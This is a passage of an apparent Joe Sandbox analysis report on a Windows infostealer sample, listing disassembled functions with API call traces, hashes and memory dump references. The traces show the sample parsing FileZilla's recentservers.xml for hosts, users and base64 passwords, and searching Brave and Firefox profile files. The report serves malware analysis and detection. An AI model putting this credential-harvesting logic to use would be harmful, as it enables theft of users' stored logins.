                                • lstrlen.KERNEL32(00501794), ref: 004E3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3CE8
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3D79
                                • lstrlen.KERNEL32(00501794), ref: 004E3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3DAD
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E43
                                • lstrlen.KERNEL32(00501794), ref: 004E3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E77
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F0D
                                • lstrlen.KERNEL32(00501794), ref: 004E3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F41
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F75
                                • lstrlen.KERNEL32(?), ref: 004E3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3FE0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E401F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004E402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E40CE
                                • lstrcat.KERNEL32(00000000), ref: 004E40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E42D9
                                • FindClose.KERNEL32(00000000), ref: 004E42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: e88a2f87de22b0fc9162e2b2f5902b299f42075cf7a3598a84cc343cef748d0a
                                • Instruction ID: 36ea910f030c9c5f4109ca612059631e3741130e8a25331ba5d3bf12afb37434
                                • Opcode Fuzzy Hash: e88a2f87de22b0fc9162e2b2f5902b299f42075cf7a3598a84cc343cef748d0a
                                • Instruction Fuzzy Hash: 8C62B471A10616DBCB22AF66CD5CAAF77B9AF50306F04822AF90593351DB7CDD01CB98
                                Function 004E6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004E69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 004E6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 004E6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004E6B35
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6B9D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: bdbf4abbaeb10c4f28be2c82db69ea64b86f34ba2c7986b96b4d464e2619d913
                                • Instruction ID: 5a216ffae96beb212c3aa47a58aba3548962e2faffcc786dedafff556cc91d6d
                                • Opcode Fuzzy Hash: bdbf4abbaeb10c4f28be2c82db69ea64b86f34ba2c7986b96b4d464e2619d913
                                • Instruction Fuzzy Hash: 2542E470A00256EBCB11ABB2CD59B6FBB79AF14345F04855AF901E7392DF7CD8018B68
                                Function 004DDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDBEF
                                • lstrlen.KERNEL32(00504CA8), ref: 004DDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC17
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004DDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC4C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDC8F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004DDCD0
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004DDCF0
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004DDD0A
                                • lstrlen.KERNEL32(004FCFEC), ref: 004DDD1D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDD7B
                                • lstrlen.KERNEL32(00501794), ref: 004DDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDA3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDDAF
                                • lstrlen.KERNEL32(?), ref: 004DDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 004DDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDE19
                                • lstrlen.KERNEL32(00501794), ref: 004DDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDE6F
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDE7B
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDEBB
                                • lstrlen.KERNEL32(00501794), ref: 004DDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDEE6
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDEF2
                                • lstrlen.KERNEL32(00CF9310), ref: 004DDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFA5
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDFB1
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDFF4
                                • lstrlen.KERNEL32(00501794), ref: 004DDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE022
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DE02E
                                • lstrlen.KERNEL32(00CF9310), ref: 004DE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 004DE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 004DE0E7
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE11F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004DE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE155
                                • lstrcat.KERNEL32(00000000,?), ref: 004DE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE19F
                                • lstrcat.KERNEL32(00000000), ref: 004DE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE1F9
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE22F
                                • lstrlen.KERNEL32(00CF9330), ref: 004DE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE261
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004DE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004DE988
                                • FindClose.KERNEL32(00000000), ref: 004DE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: 353cd3f71f6ac3b1bc070ac1a5901efc19fe2a4236d99648e7834a906852a442
                                • Instruction ID: 00de18c8bdbaf634a7041f03a1b2fba9c0feacc461eb57c0b9252a2c445ed3b9
                                • Opcode Fuzzy Hash: 353cd3f71f6ac3b1bc070ac1a5901efc19fe2a4236d99648e7834a906852a442
                                • Instruction Fuzzy Hash: 54529E70A1021ADBCB21AF75DDA9AAF77B9AF14304F04816BF8459B351DB7CDC018B98
                                Function 004D60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D60FF
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6152
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6185
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D61B5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D61F0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004D6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 8ffc86f31e34a5d8a28b2962af1ae7db6745a826074344f2ed6f38e49b8454ff
                                • Instruction ID: 7f9d930facba1b8edffc26cd216956f157170f20a5be8545fa867ab068fb08ec
                                • Opcode Fuzzy Hash: 8ffc86f31e34a5d8a28b2962af1ae7db6745a826074344f2ed6f38e49b8454ff
                                • Instruction Fuzzy Hash: 2E527F71A0021A9BCB20EBA5DD55BAF77B9AF14304F05812BF905A7351DB7CDC018B98
                                Function 004E6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6B9D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BCD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BFD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004E6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004E6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 004E6C5A
                                • lstrlen.KERNEL32(00000000), ref: 004E6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 004E6CE2
                                • lstrlen.KERNEL32(00000000), ref: 004E6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 004E6D6A
                                • lstrlen.KERNEL32(00000000), ref: 004E6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004E6DF2
                                • lstrlen.KERNEL32(00000000), ref: 004E6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004E6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004E6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004E6EC9
                                • LocalFree.KERNEL32(00000000), ref: 004E6ED4
                                • lstrlen.KERNEL32(?), ref: 004E6F6E
                                • lstrlen.KERNEL32(?), ref: 004E6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 6ff3ca26ddc3ed5053fec25881f2e44f1e2c41a8687ad2ea592307ad659e450f
                                • Instruction ID: 058f7da25ee84298ef3191f4448eb24e4899830298a0edab3b6eca888a8067b7
                                • Opcode Fuzzy Hash: 6ff3ca26ddc3ed5053fec25881f2e44f1e2c41a8687ad2ea592307ad659e450f
                                • Instruction Fuzzy Hash: 9602CF70A00256EBCB10ABB2CD59B6F7B79AF14345F14951AF902E7392DF7CD8018B68
                                Function 004E4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4B7F
                                • lstrlen.KERNEL32(00504CA8), ref: 004E4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BA7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: b7ac146ef03a685e0c7e5da465c748609c0a9f88441105c5a66de1ed5c52acbd
                                • Instruction ID: 77c88f0b9417f201fcd069411f4b3cbb88c0a5a89ba5048498c061aa6a5e6e81
                                • Opcode Fuzzy Hash: b7ac146ef03a685e0c7e5da465c748609c0a9f88441105c5a66de1ed5c52acbd
                                • Instruction Fuzzy Hash: 9F929270A01645CFDB14CF2AC954B6AB7E5AF44319F18C1AEE809DB3A2DB79DC41CB48
                                Function 004E1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E12BF
                                • lstrlen.KERNEL32(00504CA8), ref: 004E12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12E7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E133A
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E135C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1376
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E13E2
                                • lstrlen.KERNEL32(00501794), ref: 004E13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E140A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1416
                                • lstrlen.KERNEL32(?), ref: 004E1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1443
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E147A
                                • StrCmpCA.SHLWAPI(?,00CFDF98), ref: 004E14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1535
                                • StrCmpCA.SHLWAPI(?,00CFE660), ref: 004E1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E15BC
